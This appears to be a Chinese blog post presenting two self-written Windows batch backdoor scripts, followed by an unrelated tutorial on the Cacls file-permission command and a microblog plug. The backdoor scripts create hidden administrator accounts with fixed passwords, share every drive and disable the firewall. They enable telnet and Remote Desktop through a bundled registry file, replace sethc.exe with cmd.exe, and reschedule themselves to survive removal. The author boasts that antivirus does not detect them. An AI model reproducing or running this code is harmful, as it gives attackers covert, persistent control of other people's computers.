自己写的一个批处理系统后门

自己写的一个批处理系统后门 自己写的一个批处理系统后门 @echo off rem==把本批处理文件和注册文件属性设置为系统只读隐藏 attrib+s+r+h Backdoor.bat attrib+s+r+h Open3389.reg rem===把本批 处理文件和注册表文件拷贝到系统目录下 copy/y c:\windows\system32\Backdoor.bat copy/y c: \winnt\system32\Backdoor.bat copy/y c:\windows\system32\Open3389.reg copy/y c:\windows\system32\Open3389.reg rem===创建名字和密码为 hackwang的隐藏用户，并提升为管理权限 net user hackwang$hackwang/add net localgroup administrators hackwang$/add rem===开启SERVER服务，开启默认共享 sc config lanmanserver start=AUTO net start lanmanserver net share c$=c: net share d$=d: net share e$=e: net share f$=f: net share g$=g: net share h$=h: rem===关闭任务。把计划任务设置为自动。开启系统计划任务 net stop schedule sc config schedule start=AUTO net start Schedule rem===在计划任务中添加任务。定时运行本批处理文件 at 10:05 c:\winnt\SYSTEM32\Backdoor.bat at 21:11 c:\winnt\SYSTEM32\Backdoor.bat at 10:05 c: \windows\SYSTEM32\Backdoor.bat at 21:11 c: \windows\SYSTEM32\Backdoor.bat rem===关闭系统防火墙 net stop sharedaccess rem===关闭TELNET服务。把TELNET服务设置为自动。开启TELNET服务 net stop telnet sc config Tlntsvr start=AUTO net start telnet rem===SHIFT键后门 copy/y c:\windows\system32\cmd.exe c: \windows\system32\sethc.exe copy/y c:\windows\system32\sethc.exe C: dllcache\sethc.exe rem===导入注册表文件。开启终端\WINDOWS\system32\ 3389服务 regedit/s Open3389.reg rem=== @exit ===把Open3389.reg放在和Backdoor.bat同一个目录下=== 【Open3389.reg文件内容】 == Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] "fDenyTSConnections"=dword:00000000 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] "PortNumber"=dword:00000D3D [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] "PortNumber"=dword:00000D3D === 代码思路是影子鹰DESERT朋友的，原代码比较麻烦，我做了改进，这个后 门优点就是小而且不会被杀，放到SYSTEM32目录下就可以了，代码如下: @echo off @attrib+s+r xyt.bat @net user xyt hacker/add @net localgroup administrators xyt/add @net share c$=c: @net share d$=d: @net share e$=e: @net share f$=f: @net share g$=g: @net share h$=h: @tlntadmn config sec=-ntlm @net stop schedule @net start Schedule @echo at 11:00 c:\WINNT\SYSTEM32\log.bat c: \WINNT\SYSTEM32\xyt.bat @echo at 23:00 c:\WINNT\SYSTEM32\log.bat c: \WINNT\SYSTEM32\xyt.bat @at 11:05 c:\WINNT\SYS TEM32\xyt.bat @at 23:05 c:\WINNT\SYSTEM32\xyt.bat @net stop telnet @net start telnet @exit 这样就会循环运行我们的程序了，即使被人停下来，过几个小时，又回重新运行，呵呵~~ 运行后TELNET IP上去，用户名为xyt，密码为hacker。 命令行下修改文件访问权限 现在越来越多的用户使用NTFS文件系统来增强Windows系统的安全性。通常是在图形用户界面(GUI)的"安全"选项卡中对文件或目录访问控制权限进行设置。还有一种设置方式大家可能很少使用，这就是Cacls命令，虽然它是一个基于命令行的命令，使用起来有点繁琐，但只要你合理利用，也会在提高系统安全性方面起到很好的效果。Cacls命令使用格式如下: Cacls filename[/T][/E][/C][/G user:perm][/R user[.]][/P user:perm[.]][/D user[.]] Filename--显示访问控制列表(以下简称ACL); /T--更改当前目录及其所有子目录中指定文件的ACL; /E--编辑ACL而不替换; /C--在出现拒绝访问错误时继续; /G user:perm--赋予指定用户访问权限。Perm可以是R(读取)、W(写入)、C(更改，写入)、F(完全控制); /R user--撤销指定用户的访问权限(仅在与/E一起使用); /P user:perm--替换指定用户的访问权限; /D user--拒绝指定用户的访问。 1.查看目录和ACL 以Windows XP系统为例，笔者使用Cacls命令查看E盘CCE目录访问控制权限。点击"开始?运行"，在运行对话框中输入"CMD"命令，弹出命令提示符对话框，在"E:\"提示符下输入"Cacls CCE"命令，接着就会列出Windows XP系统中用户组和用户对CCE目录的访问控制权限项目。如果想查看CCE目录中所有文件访问控制权限，输入"Cacls cce\."命令即可。 2.修改目录和ACL 设置用户访问权限:我们经常要修改目录和文件的访问权限，使用Cacls命令就很容易做到。下面要赋予本机用户Chenfeng对E盘下CCE目录及其所有子目录中的文件有完全控制权限。在命令提示符对话框中输入"Cacls CCE/t/e/c/g Chenfeng:f"命令即可。 替换用户访问权限:将本机用户Chenfeng的完全控制权限替换为只读权限。在命令提示符对话框中输入"Cacls CCE/t/e/c/p Chenfeng:r"命令即可。 撤销用户访问权限:要想撤销本机用户Chenfeng对该目录的完全控制权限也很容易，在命令提示符中运行"Cacls CCE/t/e/c/r Chenfeng"即可。 拒绝用户访问:要想拒绝用户Chenfeng访问CCE目录及其所有子目录中的文件，运行"Cacls CCE/t/e/c/d Chenfeng"即可。 我最近在玩和讯微博，很方便，很实用，你也来和我一起玩吧～ 去看看我的微博吧～